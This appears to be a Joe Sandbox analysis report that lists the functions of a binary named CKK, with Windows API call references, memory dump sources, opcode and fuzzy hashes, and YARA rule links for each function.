                                          • Opcode Fuzzy Hash: 9279262e0fd6c007970a37ecfd89a055c6e3e4dff292c85e71ef11102b56c231
                                          • Instruction Fuzzy Hash: 9CB112B16083029FC710DF28D890AABB7E5AFA5764F50691DF496E72D2DB30D844CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ECAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcslen.LIBCMT ref: 00ECB198
                                          • GetSystemDirectoryW.KERNEL32 ref: 00ECB1B0
                                          • GetSystemDirectoryW.KERNEL32 ref: 00ECB1D4
                                          • _wcslen.LIBCMT ref: 00ECB200
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ECB214
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ECB236
                                          • _wcslen.LIBCMT ref: 00ECB332
                                            • Part of subcall function 00EB05A7: GetStdHandle.KERNEL32(000000F6), ref: 00EB05C6
                                          • _wcslen.LIBCMT ref: 00ECB34B
                                          • _wcslen.LIBCMT ref: 00ECB366
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ECB3B6
                                          • GetLastError.KERNEL32 ref: 00ECB407
                                          • CloseHandle.KERNEL32(?), ref: 00ECB439
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECB44A
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECB45C
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECB46E
                                          • CloseHandle.KERNEL32(?), ref: 00ECB4E3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                          • String ID:
                                          • API String ID: 2178637699-0
                                          • Opcode ID: e2530435d32a94b53fd5183d6eb78a4765474723a1b5d5c18468cd34cf94f228
                                          • Instruction ID: dce77466a729df91e970f1096f030c4562abbc21dc1dc3e8d5a18bc0250a01b3
                                          • Opcode Fuzzy Hash: e2530435d32a94b53fd5183d6eb78a4765474723a1b5d5c18468cd34cf94f228
                                          • Instruction Fuzzy Hash: EEF18B315083409FC714EF24D982B6EBBE5AF85314F14995DF899AB2A2DB32EC05CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E4326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMenuItemCount.USER32(00F11990), ref: 00E82F8D
                                          • GetMenuItemCount.USER32(00F11990), ref: 00E8303D
                                          • GetCursorPos.USER32(?), ref: 00E83081
                                          • SetForegroundWindow.USER32(00000000), ref: 00E8308A
                                          • TrackPopupMenuEx.USER32 ref: 00E8309D
                                          • PostMessageW.USER32 ref: 00E830A9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                          • String ID: 0
                                          • API String ID: 36266755-4108050209
                                          • Opcode ID: 3d8b691033b92f6b4d75c8e2d52f338b482308f84230c55f52b4296482977eea
                                          • Instruction ID: 7a9a8a011d81d02838b951551ba85c51959b5acc6c36ef0ce773a54ed75871d3
                                          • Opcode Fuzzy Hash: 3d8b691033b92f6b4d75c8e2d52f338b482308f84230c55f52b4296482977eea
                                          • Instruction Fuzzy Hash: 4C712730640206BEEB219F75DC49FAABF68FF05768F205206F62C7A1E1C7B1A914DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32 ref: 00ED6DEB
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                          • CreateWindowExW.USER32 ref: 00ED6E5F
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00ED6E81
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ED6E94
                                          • DestroyWindow.USER32 ref: 00ED6EB5
                                          • CreateWindowExW.USER32 ref: 00ED6EE4
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ED6EFD
                                          • GetDesktopWindow.USER32 ref: 00ED6F16
                                          • GetWindowRect.USER32(00000000), ref: 00ED6F1D
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00ED6F35
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00ED6F4D
                                            • Part of subcall function 00E59944: GetWindowLongW.USER32(?,000000EB), ref: 00E59952
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 2429346358-3619404913
                                          • Opcode ID: cbef19aa3a87c2214e867928736868d2d434d86ec1de6e009b074adb13ef6e0c
                                          • Instruction ID: 1e43ce2644ea6f63cd23bad9fbe59453255449de5e3d6564f9c703f7b1bb78e3
                                          • Opcode Fuzzy Hash: cbef19aa3a87c2214e867928736868d2d434d86ec1de6e009b074adb13ef6e0c
                                          • Instruction Fuzzy Hash: 2E718B70204245AFDB21CF18DC44EAABBF9FB89708F54541EF999A7361C770E90ADB12
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • DragQueryPoint.SHELL32(?,?), ref: 00ED9147
                                            • Part of subcall function 00ED7674: ClientToScreen.USER32(?,?), ref: 00ED769A
                                            • Part of subcall function 00ED7674: GetWindowRect.USER32(?,?), ref: 00ED7710
                                            • Part of subcall function 00ED7674: PtInRect.USER32(?,?,00ED8B89), ref: 00ED7720
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00ED91B0
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00ED91BB
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00ED91DE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00ED9225
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00ED923E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00ED9255
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00ED9277
                                          • DragFinish.SHELL32(?), ref: 00ED927E
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00ED9371
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                          • API String ID: 221274066-3440237614
                                          • Opcode ID: 5ee885da093f8bf8c6aad13e050561aaf9292866d6ecaf37e836697b27ad8586
                                          • Instruction ID: b2c69659bdd4815b81c42efd767a75b4526a7afe87e89616d96b9263d2be3a1f
                                          • Opcode Fuzzy Hash: 5ee885da093f8bf8c6aad13e050561aaf9292866d6ecaf37e836697b27ad8586
                                          • Instruction Fuzzy Hash: E2617C71108301AFD701DF55EC85DAFBBE8EF88750F50191EF5A5A32A1DB309A49CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EBC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EBC4B0
                                          • GetLastError.KERNEL32 ref: 00EBC4C3
                                          • SetEvent.KERNEL32 ref: 00EBC4D7
                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EBC4F0
                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00EBC533
                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EBC549
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EBC554
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EBC584
                                          • GetLastError.KERNEL32 ref: 00EBC5DC
                                          • SetEvent.KERNEL32 ref: 00EBC5F0
                                          • InternetCloseHandle.WININET(00000000), ref: 00EBC5FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                          • String ID:
                                          • API String ID: 3800310941-3916222277
                                          • Opcode ID: 5347f39de38aadec8f766a28d7e098bec8ceb16b7426ce7b4ab496769733773b
                                          • Instruction ID: ba4c642f51cca2e5588d567d9bb1f1a174c80fd78523b2413672bf95ae157614
                                          • Opcode Fuzzy Hash: 5347f39de38aadec8f766a28d7e098bec8ceb16b7426ce7b4ab496769733773b
                                          • Instruction Fuzzy Hash: F6516FB0505609BFDB218F61D988AEB7BFCFF08788F20541AF945E6110DB30E948DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00ED8592
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00ED85A2
                                          • GlobalAlloc.KERNEL32 ref: 00ED85AD
                                          • CloseHandle.KERNEL32(00000000), ref: 00ED85BA
                                          • GlobalLock.KERNEL32 ref: 00ED85C8
                                          • ReadFile.KERNEL32 ref: 00ED85D7
                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00ED85E0
                                          • CloseHandle.KERNEL32(00000000), ref: 00ED85E7
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 00ED85F8
                                          • OleLoadPicture.OLEAUT32 ref: 00ED8611
                                          • GlobalFree.KERNEL32 ref: 00ED8621
                                          • GetObjectW.GDI32 ref: 00ED8641
                                          • CopyImage.USER32 ref: 00ED8671
                                          • DeleteObject.GDI32(?), ref: 00ED8699
                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00ED86AF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                          • String ID:
                                          • API String ID: 3840717409-0
                                          • Opcode ID: 670f6d1d2c84e65b3ef72af4b1388a66ec853bf59af8790587e501142431052c
                                          • Instruction ID: 2b6c321261d40578cf546b029dcc050abcf2ded06488a28d6b3772cf8db8799a
                                          • Opcode Fuzzy Hash: 670f6d1d2c84e65b3ef72af4b1388a66ec853bf59af8790587e501142431052c
                                          • Instruction Fuzzy Hash: 4E415B71601205AFDB10CFA6ED48EAE7BBCEF89B55F10415AF815E72A0DB309905CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                          • API String ID: 1234038744-3931177956
                                          • Opcode ID: 03b1e3dda0927f4d2ecb1bfb146a1bed2c26be39c9a87ad14a19a7415f0308ce
                                          • Instruction ID: a85e244d679b2dfd034a641c4ca818b432d4472f6539c324ce85b55ae84dfb65
                                          • Opcode Fuzzy Hash: 03b1e3dda0927f4d2ecb1bfb146a1bed2c26be39c9a87ad14a19a7415f0308ce
                                          • Instruction Fuzzy Hash: B9D10132A01215DBCB209F65E8A4BFAB7F5BF45720FA49596F806BB180DB30DC44DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ECB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                            • Part of subcall function 00ECC998: CharUpperBuffW.USER32(?,?), ref: 00ECC9B5
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECC9F1
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECCA68
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECCA9E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ECB6F4
                                          • RegOpenKeyExW.ADVAPI32 ref: 00ECB772
                                          • RegDeleteValueW.ADVAPI32 ref: 00ECB80A
                                          • RegCloseKey.ADVAPI32(?), ref: 00ECB87E
                                          • RegCloseKey.ADVAPI32(?), ref: 00ECB89C
                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00ECB8F2
                                          • GetProcAddress.KERNEL32 ref: 00ECB904
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00ECB922
                                          • FreeLibrary.KERNEL32 ref: 00ECB983
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00ECB994
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 146587525-4033151799
                                          • Opcode ID: 28e69333f2d53bd837c72ace5a45f4882afabce54af65d697c8a0850858645e5
                                          • Instruction ID: 0b2459d7dacb68c62ad91c213a1d5bd11992714c61284e67eb92c8903ae73645
                                          • Opcode Fuzzy Hash: 28e69333f2d53bd837c72ace5a45f4882afabce54af65d697c8a0850858645e5
                                          • Instruction Fuzzy Hash: 3CC1B131205201AFD714DF14D595F2ABBE5FF84308F24955CF49AAB2A2CB36EC46CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: fe9b6c6ff9113daeaa080e88f8798a3b626b0c88db67035a8c17f4a93a723284
                                          • Instruction ID: 51d1817580d60614511228ac0848bcc9463cab7432c81a95ad9aa78b7576db1e
                                          • Opcode Fuzzy Hash: fe9b6c6ff9113daeaa080e88f8798a3b626b0c88db67035a8c17f4a93a723284
                                          • Instruction Fuzzy Hash: 1561D275D01219AFCB04CFA4D985EAEBBF5FF48310F20852AE955B7250D771A941CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00EA369C
                                          • _wcslen.LIBCMT ref: 00EA36A7
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EA3797
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00EA380C
                                          • GetDlgCtrlID.USER32 ref: 00EA385D
                                          • GetWindowRect.USER32(?,?), ref: 00EA3882
                                          • GetParent.USER32(?), ref: 00EA38A0
                                          • ScreenToClient.USER32(00000000), ref: 00EA38A7
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00EA3921
                                          • GetWindowTextW.USER32 ref: 00EA395D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                          • String ID: %s%u
                                          • API String ID: 4010501982-679674701
                                          • Opcode ID: a13f3e276bff7b69fde4edbdbabc7cca029ef7357e0c7205c2dfe6d11b808528
                                          • Instruction ID: a586d54842d3cf8df8c5e428e5848ce94dc786d5f8a9064abb33481ad675f98f
                                          • Opcode Fuzzy Hash: a13f3e276bff7b69fde4edbdbabc7cca029ef7357e0c7205c2dfe6d11b808528
                                          • Instruction Fuzzy Hash: D391D471204606AFD708DF34D885BABB7E8FF49344F105619F999EA190DB30FA45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00EA4994
                                          • GetWindowTextW.USER32 ref: 00EA49DA
                                          • _wcslen.LIBCMT ref: 00EA49EB
                                          • CharUpperBuffW.USER32(?,00000000), ref: 00EA49F7
                                          • _wcsstr.LIBVCRUNTIME ref: 00EA4A2C
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00EA4A64
                                          • GetWindowTextW.USER32 ref: 00EA4A9D
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00EA4AE6
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00EA4B20
                                          • GetWindowRect.USER32(?,?), ref: 00EA4B8B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                          • String ID: ThumbnailClass
                                          • API String ID: 1311036022-1241985126
                                          • Opcode ID: e3fc6295e9d86531c58c6f2f7b4109f9c5b69ffa8080b16b6aa9fc6e41a1f56f
                                          • Instruction ID: fcc3b6d302abac2956813e8fa843f1b353f47437fae51995ab024a7468d24fb5
                                          • Opcode Fuzzy Hash: e3fc6295e9d86531c58c6f2f7b4109f9c5b69ffa8080b16b6aa9fc6e41a1f56f
                                          • Instruction Fuzzy Hash: 8A91C1B10042059FDB04CF14D981BAAB7E8EF89758F04646AFD85AE0D6DB70FD45CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • PostMessageW.USER32 ref: 00ED8D5A
                                          • GetFocus.USER32 ref: 00ED8D6A
                                          • GetDlgCtrlID.USER32 ref: 00ED8D75
                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00ED8E1D
                                          • GetMenuItemInfoW.USER32 ref: 00ED8ECF
                                          • GetMenuItemCount.USER32(?), ref: 00ED8EEC
                                          • GetMenuItemID.USER32(?,00000000), ref: 00ED8EFC
                                          • GetMenuItemInfoW.USER32 ref: 00ED8F2E
                                          • GetMenuItemInfoW.USER32 ref: 00ED8F70
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ED8FA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                          • String ID: 0
                                          • API String ID: 1026556194-4108050209
                                          • Opcode ID: eab0841a4aabed14ec1376dbac5dfb156b4641bee7e775779b0774e390a09385
                                          • Instruction ID: 095d54bbc1780bcc5fad21463019d54299782f5474ee3c4b90586476e486beba
                                          • Opcode Fuzzy Hash: eab0841a4aabed14ec1376dbac5dfb156b4641bee7e775779b0774e390a09385
                                          • Instruction Fuzzy Hash: 4181BE716043059FD720CF14DE84AAB7BE9FB88758F142A1EF994A7391DB30D906CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ECCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00ECCC64
                                          • RegOpenKeyExW.ADVAPI32 ref: 00ECCC8D
                                          • FreeLibrary.KERNEL32 ref: 00ECCD48
                                            • Part of subcall function 00ECCC34: RegCloseKey.ADVAPI32(?), ref: 00ECCCAA
                                            • Part of subcall function 00ECCC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00ECCCBD
                                            • Part of subcall function 00ECCC34: GetProcAddress.KERNEL32 ref: 00ECCCCF
                                            • Part of subcall function 00ECCC34: FreeLibrary.KERNEL32 ref: 00ECCD05
                                            • Part of subcall function 00ECCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00ECCD28
